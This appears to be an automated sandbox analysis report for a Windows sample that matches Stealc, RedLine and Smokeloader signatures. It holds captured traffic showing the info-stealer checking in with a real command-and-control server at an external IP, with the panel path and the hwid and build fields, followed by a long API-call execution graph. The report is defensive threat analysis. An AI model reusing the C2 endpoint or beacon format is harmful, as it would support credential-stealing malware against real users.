                      Sep 25, 2024 16:07:06.584721088 CEST8049704193.233.113.184192.168.2.5
                      Sep 25, 2024 16:07:06.584817886 CEST4970480192.168.2.5193.233.113.184
                      Sep 25, 2024 16:07:06.585063934 CEST4970480192.168.2.5193.233.113.184
                      Sep 25, 2024 16:07:06.589922905 CEST8049704193.233.113.184192.168.2.5
                      Sep 25, 2024 16:07:07.264065981 CEST8049704193.233.113.184192.168.2.5
                      Sep 25, 2024 16:07:07.264152050 CEST4970480192.168.2.5193.233.113.184
                      Sep 25, 2024 16:07:07.709641933 CEST4970480192.168.2.5193.233.113.184
                      Sep 25, 2024 16:07:07.715259075 CEST8049704193.233.113.184192.168.2.5
                      Sep 25, 2024 16:07:07.928442955 CEST8049704193.233.113.184192.168.2.5
                      Sep 25, 2024 16:07:07.928508997 CEST4970480192.168.2.5193.233.113.184
                      Sep 25, 2024 16:07:12.933433056 CEST8049704193.233.113.184192.168.2.5
                      Sep 25, 2024 16:07:12.933526993 CEST4970480192.168.2.5193.233.113.184
                      Sep 25, 2024 16:07:23.154136896 CEST4970480192.168.2.5193.233.113.184
                      TimestampSource PortDest PortSource IPDest IP
                      Sep 25, 2024 16:07:37.823580980 CEST5357268162.159.36.2192.168.2.5
                      Sep 25, 2024 16:07:38.318958044 CEST6238853192.168.2.51.1.1.1
                      Sep 25, 2024 16:07:38.327558994 CEST53623881.1.1.1192.168.2.5
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Sep 25, 2024 16:07:38.318958044 CEST192.168.2.51.1.1.10x1560Standard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Sep 25, 2024 16:07:38.327558994 CEST1.1.1.1192.168.2.50x1560Name error (3)206.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                      • 193.233.113.184
                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.549704193.233.113.184806584C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Sep 25, 2024 16:07:06.585063934 CEST90OUTGET / HTTP/1.1
                      Host: 193.233.113.184
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Sep 25, 2024 16:07:07.264065981 CEST203INHTTP/1.1 200 OK
                      Date: Wed, 25 Sep 2024 14:07:07 GMT
                      Server: Apache/2.4.41 (Ubuntu)
                      Content-Length: 0
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Sep 25, 2024 16:07:07.709641933 CEST419OUTPOST /6d687e53250c2111.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFH
                      Host: 193.233.113.184
                      Content-Length: 217
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Data Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 42 39 34 46 37 46 44 32 32 34 37 39 36 39 32 32 37 39 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 2d 2d 0d 0a
                      Data Ascii: ------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="hwid"FCB94F7FD224796922796------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="build"LogsDiller1------GCBGIIECGHCAKECAFBFH--
                      Sep 25, 2024 16:07:07.928442955 CEST210INHTTP/1.1 200 OK
                      Date: Wed, 25 Sep 2024 14:07:07 GMT
                      Server: Apache/2.4.41 (Ubuntu)
                      Content-Length: 8
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 59 6d 78 76 59 32 73 3d
                      Data Ascii: YmxvY2s=


                      Click to jump to process

                      Click to jump to process

                      Click to dive into process behavior distribution

                      Click to jump to process

                      Target ID:0
                      Start time:10:07:04
                      Start date:25/09/2024
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\file.exe"
                      Imagebase:0x400000
                      File size:418'304 bytes
                      MD5 hash:B9685047E27FBB94AB3BD20943B85349
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2192054558.00000000024AE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2192078423.00000000024DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2036702828.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:true

                      Target ID:4
                      Start time:10:07:07
                      Start date:25/09/2024
                      Path:C:\Windows\SysWOW64\WerFault.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6584 -s 1048
                      Imagebase:0x5a0000
                      File size:483'680 bytes
                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Reset < >

                        Execution Graph

                        Execution Coverage:6.7%
                        Dynamic/Decrypted Code Coverage:7.3%
                        Signature Coverage:12.3%
                        Total number of Nodes:1415
                        Total number of Limit Nodes:28
                        execution_graph 27548 409440 strlen malloc strcpy_s free std::exception::exception 27619 40b6a0a ExitProcess 27620 41ce48 LeaveCriticalSection __mtinitlocknum 27592 40bd106 41 API calls __amsg_exit 27521 40a0005 27526 40a092b GetPEB 27521->27526 27523 40a0030 27527 40a003c 27523->27527 27526->27523 27528 40a0049 27527->27528 27542 40a0e0f SetErrorMode SetErrorMode 27528->27542 27533 40a02ce VirtualProtect 27536 40a030b 27533->27536 27534 40a0265 27534->27533 27535 40a0439 VirtualFree 27540 40a05f4 LoadLibraryA 27535->27540 27541 40a04be 27535->27541 27536->27535 27537 40a04e3 LoadLibraryA 27537->27541 27539 40a08c7 27540->27539 27541->27537 27541->27540 27543 40a0223 27542->27543 27544 40a0d90 27543->27544 27545 40a0dad 27544->27545 27546 40a0dbb GetPEB 27545->27546 27547 40a0238 VirtualAlloc 27545->27547 27546->27547 27547->27534 27549 41b050 6 API calls 3 library calls 27623 40b15b3 18 API calls codecvt 27506 24afa56 27507 24afa65 27506->27507 27510 24b01f6 27507->27510 27512 24b0211 27510->27512 27511 24b021a CreateToolhelp32Snapshot 27511->27512 27513 24b0236 Module32First 27511->27513 27512->27511 27512->27513 27514 24afa6e 27513->27514 27515 24b0245 27513->27515 27517 24afeb5 27515->27517 27518 24afee0 27517->27518 27519 24aff29 27518->27519 27520 24afef1 VirtualAlloc 27518->27520 27519->27519 27520->27519 27659 406f60 memcpy 27660 40a932a ??2@YAPAXI RaiseException allocator 27551 41dc60 atexit 27661 410765 279 API calls 27626 417667 lstrcpy 27595 40b1525 strtok_s strtok_s codecvt 27627 41b270 5 API calls 2 library calls 27663 40a9b37 9 API calls 27555 40b1c35 110 API calls 27629 40b3b7d 91 API calls 2 library calls 27630 40b6a40 6 API calls 27557 41bc11 71 API calls 2 library calls 27597 40b6d18 642 API calls 27558 40b102b strtok_s lstrlen lstrcpy 27561 40b6c57 688 API calls 27563 41ac2c 71 API calls ctype 27601 40af567 56 API calls 27602 40afd67 152 API calls 27631 40bbe78 162 API calls 2 library calls 27632 40bcd97 170 API calls 2 library calls 27604 40b118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27566 4090c3 5 API calls allocator 27605 40bcd8f 6 API calls 2 library calls 27568 40b102b StrCmpCA strtok_s 27570 40b3823 StrCmpCA StrCmpCA StrCmpCA strtok_s 27669 41abd0 free std::exception::_Tidy ctype 27635 40bae93 43 API calls 2 library calls 27670 413916 91 API calls 2 library calls 27636 40b0297 131 API calls 27671 4183dc 15 API calls 27571 40b140b StrCmpCA strtok_s lstrlen lstrcpy 27572 40bd0af RtlLeaveCriticalSection __mtinitlocknum 27637 40b32ae 22 API calls 27573 4090e7 memcpy RaiseException codecvt __CxxThrowException@8 27607 40bcd90 173 API calls 3 library calls 27638 41ceea SetUnhandledExceptionFilter 26090 4169f0 26133 402260 26090->26133 26107 417850 3 API calls 26108 416a30 26107->26108 26109 4178e0 3 API calls 26108->26109 26110 416a43 26109->26110 26266 41a9b0 26110->26266 26112 416a64 26113 41a9b0 4 API calls 26112->26113 26114 416a6b 26113->26114 26115 41a9b0 4 API calls 26114->26115 26116 416a72 26115->26116 26117 41a9b0 4 API calls 26116->26117 26118 416a79 26117->26118 26119 41a9b0 4 API calls 26118->26119 26120 416a80 26119->26120 26274 41a8a0 26120->26274 26122 416b0c 26278 416920 GetSystemTime 26122->26278 26123 416a89 26123->26122 26125 416ac2 OpenEventA 26123->26125 26127 416af5 CloseHandle Sleep 26125->26127 26128 416ad9 26125->26128 26131 416b0a 26127->26131 26132 416ae1 CreateEventA 26128->26132 26130 416b16 CloseHandle ExitProcess 26131->26123 26132->26122 26475 4045c0 17 API calls 26133->26475 26135 402274 26136 4045c0 34 API calls 26135->26136 26137 40228d 26136->26137 26138 4045c0 34 API calls 26137->26138 26139 4022a6 26138->26139 26140 4045c0 34 API calls 26139->26140 26141 4022bf 26140->26141 26142 4045c0 34 API calls 26141->26142 26143 4022d8 26142->26143 26144 4045c0 34 API calls 26143->26144 26145 4022f1 26144->26145 26146 4045c0 34 API calls 26145->26146 26147 40230a 26146->26147 26148 4045c0 34 API calls 26147->26148 26149 402323 26148->26149 26150 4045c0 34 API calls 26149->26150 26151 40233c 26150->26151 26152 4045c0 34 API calls 26151->26152 26153 402355 26152->26153 26154 4045c0 34 API calls 26153->26154 26155 40236e 26154->26155 26156 4045c0 34 API calls 26155->26156 26157 402387 26156->26157 26158 4045c0 34 API calls 26157->26158 26159 4023a0 26158->26159 26160 4045c0 34 API calls 26159->26160 26161 4023b9 26160->26161 26162 4045c0 34 API calls 26161->26162 26163 4023d2 26162->26163 26164 4045c0 34 API calls 26163->26164 26165 4023eb 26164->26165 26166 4045c0 34 API calls 26165->26166 26167 402404 26166->26167 26168 4045c0 34 API calls 26167->26168 26169 40241d 26168->26169 26170 4045c0 34 API calls 26169->26170 26171 402436 26170->26171 26172 4045c0 34 API calls 26171->26172 26173 40244f 26172->26173 26174 4045c0 34 API calls 26173->26174 26175 402468 26174->26175 26176 4045c0 34 API calls 26175->26176 26177 402481 26176->26177 26178 4045c0 34 API calls 26177->26178 26179 40249a 26178->26179 26180 4045c0 34 API calls 26179->26180 26181 4024b3 26180->26181 26182 4045c0 34 API calls 26181->26182 26183 4024cc 26182->26183 26184 4045c0 34 API calls 26183->26184 26185 4024e5 26184->26185 26186 4045c0 34 API calls 26185->26186 26187 4024fe 26186->26187 26188 4045c0 34 API calls 26187->26188 26189 402517 26188->26189 26190 4045c0 34 API calls 26189->26190 26191 402530 26190->26191 26192 4045c0 34 API calls 26191->26192 26193 402549 26192->26193 26194 4045c0 34 API calls 26193->26194 26195 402562 26194->26195 26196 4045c0 34 API calls 26195->26196 26197 40257b 26196->26197 26198 4045c0 34 API calls 26197->26198 26199 402594 26198->26199 26200 4045c0 34 API calls 26199->26200 26201 4025ad 26200->26201 26202 4045c0 34 API calls 26201->26202 26203 4025c6 26202->26203 26204 4045c0 34 API calls 26203->26204 26205 4025df 26204->26205 26206 4045c0 34 API calls 26205->26206 26207 4025f8 26206->26207 26208 4045c0 34 API calls 26207->26208 26209 402611 26208->26209 26210 4045c0 34 API calls 26209->26210 26211 40262a 26210->26211 26212 4045c0 34 API calls 26211->26212 26213 402643 26212->26213 26214 4045c0 34 API calls 26213->26214 26215 40265c 26214->26215 26216 4045c0 34 API calls 26215->26216 26217 402675 26216->26217 26218 4045c0 34 API calls 26217->26218 26219 40268e 26218->26219 26220 419860 26219->26220 26479 419750 GetPEB 26220->26479 26222 419868 26223 419a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26222->26223 26224 41987a 26222->26224 26225 419af4 GetProcAddress 26223->26225 26226 419b0d 26223->26226 26227 41988c 21 API calls 26224->26227 26225->26226 26228 419b46 26226->26228 26229 419b16 GetProcAddress GetProcAddress 26226->26229 26227->26223 26230 419b68 26228->26230 26231 419b4f GetProcAddress 26228->26231 26229->26228 26232 419b71 GetProcAddress 26230->26232 26233 419b89 26230->26233 26231->26230 26232->26233 26234 416a00 26233->26234 26235 419b92 GetProcAddress GetProcAddress 26233->26235 26236 41a740 26234->26236 26235->26234 26237 41a750 26236->26237 26238 416a0d 26237->26238 26239 41a77e lstrcpy 26237->26239 26240 4011d0 26238->26240 26239->26238 26241 4011e8 26240->26241 26242 401217 26241->26242 26243 40120f ExitProcess 26241->26243 26244 401160 GetSystemInfo 26242->26244 26245 401184 26244->26245 26246 40117c ExitProcess 26244->26246 26247 401110 GetCurrentProcess VirtualAllocExNuma 26245->26247 26248 401141 ExitProcess 26247->26248 26249 401149 26247->26249 26480 4010a0 VirtualAlloc 26249->26480 26252 401220 26484 4189b0 26252->26484 26255 401249 __aulldiv 26256 40129a 26255->26256 26257 401292 ExitProcess 26255->26257 26258 416770 GetUserDefaultLangID 26256->26258 26259 4167d3 GetUserDefaultLCID 26258->26259 26260 416792 26258->26260 26259->26107 26260->26259 26261 4167c1 ExitProcess 26260->26261 26262 4167a3 ExitProcess 26260->26262 26263 4167b7 ExitProcess 26260->26263 26264 4167cb ExitProcess 26260->26264 26265 4167ad ExitProcess 26260->26265 26486 41a710 26266->26486 26268 41a9c1 lstrlenA 26270 41a9e0 26268->26270 26269 41aa18 26487 41a7a0 26269->26487 26270->26269 26272 41a9fa lstrcpy lstrcatA 26270->26272 26272->26269 26273 41aa24 26273->26112 26275 41a8bb 26274->26275 26276 41a90b 26275->26276 26277 41a8f9 lstrcpy 26275->26277 26276->26123 26277->26276 26491 416820 26278->26491 26280 41698e 26281 416998 sscanf 26280->26281 26520 41a800 26281->26520 26283 4169aa SystemTimeToFileTime SystemTimeToFileTime 26284 4169e0 26283->26284 26285 4169ce 26283->26285 26287 415b10 26284->26287 26285->26284 26286 4169d8 ExitProcess 26285->26286 26288 415b1d 26287->26288 26289 41a740 lstrcpy 26288->26289 26290 415b2e 26289->26290 26522 41a820 lstrlenA 26290->26522 26293 41a820 2 API calls 26294 415b64 26293->26294 26295 41a820 2 API calls 26294->26295 26296 415b74 26295->26296 26526 416430 26296->26526 26299 41a820 2 API calls 26300 415b93 26299->26300 26301 41a820 2 API calls 26300->26301 26302 415ba0 26301->26302 26303 41a820 2 API calls 26302->26303 26304 415bad 26303->26304 26305 41a820 2 API calls 26304->26305 26306 415bf9 26305->26306 26535 4026a0 26306->26535 26314 415cc3 26315 416430 lstrcpy 26314->26315 26316 415cd5 26315->26316 26317 41a7a0 lstrcpy 26316->26317 26318 415cf2 26317->26318 26319 41a9b0 4 API calls 26318->26319 26320 415d0a 26319->26320 26321 41a8a0 lstrcpy 26320->26321 26322 415d16 26321->26322 26323 41a9b0 4 API calls 26322->26323 26324 415d3a 26323->26324 26325 41a8a0 lstrcpy 26324->26325 26326 415d46 26325->26326 26327 41a9b0 4 API calls 26326->26327 26328 415d6a 26327->26328 26329 41a8a0 lstrcpy 26328->26329 26330 415d76 26329->26330 26331 41a740 lstrcpy 26330->26331 26332 415d9e 26331->26332 27259 417500 GetWindowsDirectoryA 26332->27259 26335 41a7a0 lstrcpy 26336 415db8 26335->26336 27269 404880 26336->27269 26338 415dbe 27415 4117a0 26338->27415 26340 415dc6 26341 41a740 lstrcpy 26340->26341 26342 415de9 26341->26342 26343 401590 lstrcpy 26342->26343 26344 415dfd 26343->26344 27435 405960 39 API calls ctype 26344->27435 26346 415e03 27436 411050 strtok_s strtok_s lstrlenA lstrcpy 26346->27436 26348 415e0e 26349 41a740 lstrcpy 26348->26349 26350 415e32 26349->26350 26351 401590 lstrcpy 26350->26351 26352 415e46 26351->26352 27437 405960 39 API calls ctype 26352->27437 26354 415e4c 27438 410d90 7 API calls 26354->27438 26356 415e57 26357 41a740 lstrcpy 26356->26357 26358 415e79 26357->26358 26359 401590 lstrcpy 26358->26359 26360 415e8d 26359->26360 27439 405960 39 API calls ctype 26360->27439 26362 415e93 27440 410f40 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26362->27440 26364 415e9e 26365 401590 lstrcpy 26364->26365 26366 415eb5 26365->26366 27441 411a10 121 API calls 26366->27441 26368 415eba 26369 41a740 lstrcpy 26368->26369 26370 415ed6 26369->26370 27442 404fb0 8 API calls 26370->27442 26372 415edb 26373 401590 lstrcpy 26372->26373 26374 415f5b 26373->26374 27443 410740 292 API calls 26374->27443 26376 415f60 26377 41a740 lstrcpy 26376->26377 26378 415f86 26377->26378 26379 401590 lstrcpy 26378->26379 26380 415f9a 26379->26380 27444 405960 39 API calls ctype 26380->27444 26382 415fa0 27445 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26382->27445 26384 415fab 26385 401590 lstrcpy 26384->26385 26386 415feb 26385->26386 27446 401e80 67 API calls 26386->27446 26388 415ff0 26389 416000 26388->26389 26390 416092 26388->26390 26392 41a740 lstrcpy 26389->26392 26391 41a7a0 lstrcpy 26390->26391 26394 4160a5 26391->26394 26393 416020 26392->26393 26395 401590 lstrcpy 26393->26395 26396 401590 lstrcpy 26394->26396 26397 416034 26395->26397 26398 4160b9 26396->26398 27447 405960 39 API calls ctype 26397->27447 27450 405960 39 API calls ctype 26398->27450 26401 4160bf 27451 413560 36 API calls 26401->27451 26402 41603a 27448 4112d0 21 API calls ctype 26402->27448 26405 41608a 26408 41610b 26405->26408 26410 401590 lstrcpy 26405->26410 26406 416045 26407 401590 lstrcpy 26406->26407 26409 416085 26407->26409 26412 416130 26408->26412 26413 401590 lstrcpy 26408->26413 27449 413dc0 75 API calls 26409->27449 26415 4160e7 26410->26415 26414 416155 26412->26414 26417 401590 lstrcpy 26412->26417 26416 41612b 26413->26416 26419 41617a 26414->26419 26424 401590 lstrcpy 26414->26424 27452 4140b0 64 API calls ctype 26415->27452 27454 414780 116 API calls ctype 26416->27454 26422 416150 26417->26422 26420 41619f 26419->26420 26425 401590 lstrcpy 26419->26425 26426 4161c4 26420->26426 26431 401590 lstrcpy 26420->26431 27455 414bb0 67 API calls ctype 26422->27455 26423 4160ec 26428 401590 lstrcpy 26423->26428 26429 416175 26424->26429 26430 41619a 26425->26430 26433 4161e9 26426->26433 26439 401590 lstrcpy 26426->26439 26432 416106 26428->26432 27456 414d70 75 API calls 26429->27456 27457 414f40 69 API calls ctype 26430->27457 26437 4161bf 26431->26437 27453 415100 71 API calls 26432->27453 26435 416210 26433->26435 26440 401590 lstrcpy 26433->26440 26441 416220 26435->26441 26442 4162b3 26435->26442 27458 407710 125 API calls ctype 26437->27458 26444 4161e4 26439->26444 26446 416209 26440->26446 26448 41a740 lstrcpy 26441->26448 26447 41a7a0 lstrcpy 26442->26447 27459 415050 67 API calls ctype 26444->27459 27460 419010 54 API calls ctype 26446->27460 26450 4162c6 26447->26450 26451 416241 26448->26451 26452 401590 lstrcpy 26450->26452 26453 401590 lstrcpy 26451->26453 26454 4162da 26452->26454 26455 416255 26453->26455 27464 405960 39 API calls ctype 26454->27464 27461 405960 39 API calls ctype 26455->27461 26458 4162e0 27465 413560 36 API calls 26458->27465 26459 41625b 27462 4112d0 21 API calls ctype 26459->27462 26462 416266 26464 401590 lstrcpy 26462->26464 26463 4162ab 26465 41a7a0 lstrcpy 26463->26465 26466 4162a6 26464->26466 26467 4162fc 26465->26467 27463 413dc0 75 API calls 26466->27463 26469 401590 lstrcpy 26467->26469 26470 416310 26469->26470 27466 405960 39 API calls ctype 26470->27466 26472 41631c 26474 416338 26472->26474 27467 416630 9 API calls ctype 26472->27467 26474->26130 26476 404697 26475->26476 26477 4046ac 11 API calls 26476->26477 26478 40474f 6 API calls 26476->26478 26477->26476 26478->26135 26479->26222 26481 4010c2 ctype 26480->26481 26482 4010fd 26481->26482 26483 4010e2 VirtualFree 26481->26483 26482->26252 26483->26482 26485 401233 GlobalMemoryStatusEx 26484->26485 26485->26255 26486->26268 26488 41a7c2 26487->26488 26489 41a7ec 26488->26489 26490 41a7da lstrcpy 26488->26490 26489->26273 26490->26489 26492 41a740 lstrcpy 26491->26492 26493 416833 26492->26493 26494 41a9b0 4 API calls 26493->26494 26495 416845 26494->26495 26496 41a8a0 lstrcpy 26495->26496 26497 41684e 26496->26497 26498 41a9b0 4 API calls 26497->26498 26499 416867 26498->26499 26500 41a8a0 lstrcpy 26499->26500 26501 416870 26500->26501 26502 41a9b0 4 API calls 26501->26502 26503 41688a 26502->26503 26504 41a8a0 lstrcpy 26503->26504 26505 416893 26504->26505 26506 41a9b0 4 API calls 26505->26506 26507 4168ac 26506->26507 26508 41a8a0 lstrcpy 26507->26508 26509 4168b5 26508->26509 26510 41a9b0 4 API calls 26509->26510 26511 4168cf 26510->26511 26512 41a8a0 lstrcpy 26511->26512 26513 4168d8 26512->26513 26514 41a9b0 4 API calls 26513->26514 26515 4168f3 26514->26515 26516 41a8a0 lstrcpy 26515->26516 26517 4168fc 26516->26517 26518 41a7a0 lstrcpy 26517->26518 26519 416910 26518->26519 26519->26280 26521 41a812 26520->26521 26521->26283 26523 41a83f 26522->26523 26524 415b54 26523->26524 26525 41a87b lstrcpy 26523->26525 26524->26293 26525->26524 26527 41a8a0 lstrcpy 26526->26527 26528 416443 26527->26528 26529 41a8a0 lstrcpy 26528->26529 26530 416455 26529->26530 26531 41a8a0 lstrcpy 26530->26531 26532 416467 26531->26532 26533 41a8a0 lstrcpy 26532->26533 26534 415b86 26533->26534 26534->26299 26536 4045c0 34 API calls 26535->26536 26537 4026b4 26536->26537 26538 4045c0 34 API calls 26537->26538 26539 4026d7 26538->26539 26540 4045c0 34 API calls 26539->26540 26541 4026f0 26540->26541 26542 4045c0 34 API calls 26541->26542 26543 402709 26542->26543 26544 4045c0 34 API calls 26543->26544 26545 402736 26544->26545 26546 4045c0 34 API calls 26545->26546 26547 40274f 26546->26547 26548 4045c0 34 API calls 26547->26548 26549 402768 26548->26549 26550 4045c0 34 API calls 26549->26550 26551 402795 26550->26551 26552 4045c0 34 API calls 26551->26552 26553 4027ae 26552->26553 26554 4045c0 34 API calls 26553->26554 26555 4027c7 26554->26555 26556 4045c0 34 API calls 26555->26556 26557 4027e0 26556->26557 26558 4045c0 34 API calls 26557->26558 26559 4027f9 26558->26559 26560 4045c0 34 API calls 26559->26560 26561 402812 26560->26561 26562 4045c0 34 API calls 26561->26562 26563 40282b 26562->26563 26564 4045c0 34 API calls 26563->26564 26565 402844 26564->26565 26566 4045c0 34 API calls 26565->26566 26567 40285d 26566->26567 26568 4045c0 34 API calls 26567->26568 26569 402876 26568->26569 26570 4045c0 34 API calls 26569->26570 26571 40288f 26570->26571 26572 4045c0 34 API calls 26571->26572 26573 4028a8 26572->26573 26574 4045c0 34 API calls 26573->26574 26575 4028c1 26574->26575 26576 4045c0 34 API calls 26575->26576 26577 4028da 26576->26577 26578 4045c0 34 API calls 26577->26578 26579 4028f3 26578->26579 26580 4045c0 34 API calls 26579->26580 26581 40290c 26580->26581 26582 4045c0 34 API calls 26581->26582 26583 402925 26582->26583 26584 4045c0 34 API calls 26583->26584 26585 40293e 26584->26585 26586 4045c0 34 API calls 26585->26586 26587 402957 26586->26587 26588 4045c0 34 API calls 26587->26588 26589 402970 26588->26589 26590 4045c0 34 API calls 26589->26590 26591 402989 26590->26591 26592 4045c0 34 API calls 26591->26592 26593 4029a2 26592->26593 26594 4045c0 34 API calls 26593->26594 26595 4029bb SetFilePointer 26594->26595 26596 4045c0 34 API calls 26595->26596 26597 4029ed 26596->26597 26598 4045c0 34 API calls 26597->26598 26599 402a06 26598->26599 26600 4045c0 34 API calls 26599->26600 26601 402a1f 26600->26601 26602 4045c0 34 API calls 26601->26602 26603 402a38 26602->26603 26604 4045c0 34 API calls 26603->26604 26605 402a51 26604->26605 26606 4045c0 34 API calls 26605->26606 26607 402a6a 26606->26607 26608 4045c0 34 API calls 26607->26608 26609 402a83 26608->26609 26610 4045c0 34 API calls 26609->26610 26611 402a9c 26610->26611 26612 4045c0 34 API calls 26611->26612 26613 402ab5 26612->26613 26614 4045c0 34 API calls 26613->26614 26615 402ace 26614->26615 26616 4045c0 34 API calls 26615->26616 26617 402ae7 26616->26617 26618 4045c0 34 API calls 26617->26618 26619 402b00 26618->26619 26620 4045c0 34 API calls 26619->26620 26621 402b19 26620->26621 26622 4045c0 34 API calls 26621->26622 26623 402b32 26622->26623 26624 4045c0 34 API calls 26623->26624 26625 402b4b 26624->26625 26626 4045c0 34 API calls 26625->26626 26627 402b64 26626->26627 26628 4045c0 34 API calls 26627->26628 26629 402b7d 26628->26629 26630 4045c0 34 API calls 26629->26630 26631 402b96 26630->26631 26632 4045c0 34 API calls 26631->26632 26633 402baf 26632->26633 26634 4045c0 34 API calls 26633->26634 26635 402bc8 26634->26635 26636 4045c0 34 API calls 26635->26636 26637 402be1 26636->26637 26638 4045c0 34 API calls 26637->26638 26639 402bfa 26638->26639 26640 4045c0 34 API calls 26639->26640 26641 402c13 26640->26641 26642 4045c0 34 API calls 26641->26642 26643 402c2c 26642->26643 26644 4045c0 34 API calls 26643->26644 26645 402c45 26644->26645 26646 4045c0 34 API calls 26645->26646 26647 402c5e 26646->26647 26648 4045c0 34 API calls 26647->26648 26649 402c77 26648->26649 26650 4045c0 34 API calls 26649->26650 26651 402c90 26650->26651 26652 4045c0 34 API calls 26651->26652 26653 402ca9 26652->26653 26654 4045c0 34 API calls 26653->26654 26655 402cc2 26654->26655 26656 4045c0 34 API calls 26655->26656 26657 402cdb 26656->26657 26658 4045c0 34 API calls 26657->26658 26659 402cf4 26658->26659 26660 4045c0 34 API calls 26659->26660 26661 402d0d 26660->26661 26662 4045c0 34 API calls 26661->26662 26663 402d26 26662->26663 26664 4045c0 34 API calls 26663->26664 26665 402d3f 26664->26665 26666 4045c0 34 API calls 26665->26666 26667 402d58 26666->26667 26668 4045c0 34 API calls 26667->26668 26669 402d71 26668->26669 26670 4045c0 34 API calls 26669->26670 26671 402d8a 26670->26671 26672 4045c0 34 API calls 26671->26672 26673 402da3 26672->26673 26674 4045c0 34 API calls 26673->26674 26675 402dbc 26674->26675 26676 4045c0 34 API calls 26675->26676 26677 402dd5 26676->26677 26678 4045c0 34 API calls 26677->26678 26679 402dee 26678->26679 26680 4045c0 34 API calls 26679->26680 26681 402e07 26680->26681 26682 4045c0 34 API calls 26681->26682 26683 402e20 26682->26683 26684 4045c0 34 API calls 26683->26684 26685 402e39 26684->26685 26686 4045c0 34 API calls 26685->26686 26687 402e52 26686->26687 26688 4045c0 34 API calls 26687->26688 26689 402e6b 26688->26689 26690 4045c0 34 API calls 26689->26690 26691 402e84 26690->26691 26692 4045c0 34 API calls 26691->26692 26693 402e9d 26692->26693 26694 4045c0 34 API calls 26693->26694 26695 402eb6 26694->26695 26696 4045c0 34 API calls 26695->26696 26697 402ecf 26696->26697 26698 4045c0 34 API calls 26697->26698 26699 402ee8 26698->26699 26700 4045c0 34 API calls 26699->26700 26701 402f01 26700->26701 26702 4045c0 34 API calls 26701->26702 26703 402f1a 26702->26703 26704 4045c0 34 API calls 26703->26704 26705 402f33 26704->26705 26706 4045c0 34 API calls 26705->26706 26707 402f4c 26706->26707 26708 4045c0 34 API calls 26707->26708 26709 402f65 26708->26709 26710 4045c0 34 API calls 26709->26710 26711 402f7e 26710->26711 26712 4045c0 34 API calls 26711->26712 26713 402f97 26712->26713 26714 4045c0 34 API calls 26713->26714 26715 402fb0 26714->26715 26716 4045c0 34 API calls 26715->26716 26717 402fc9 26716->26717 26718 4045c0 34 API calls 26717->26718 26719 402fe2 26718->26719 26720 4045c0 34 API calls 26719->26720 26721 402ffb 26720->26721 26722 4045c0 34 API calls 26721->26722 26723 403014 26722->26723 26724 4045c0 34 API calls 26723->26724 26725 40302d 26724->26725 26726 4045c0 34 API calls 26725->26726 26727 403046 26726->26727 26728 4045c0 34 API calls 26727->26728 26729 40305f 26728->26729 26730 4045c0 34 API calls 26729->26730 26731 403078 26730->26731 26732 4045c0 34 API calls 26731->26732 26733 403091 26732->26733 26734 4045c0 34 API calls 26733->26734 26735 4030aa 26734->26735 26736 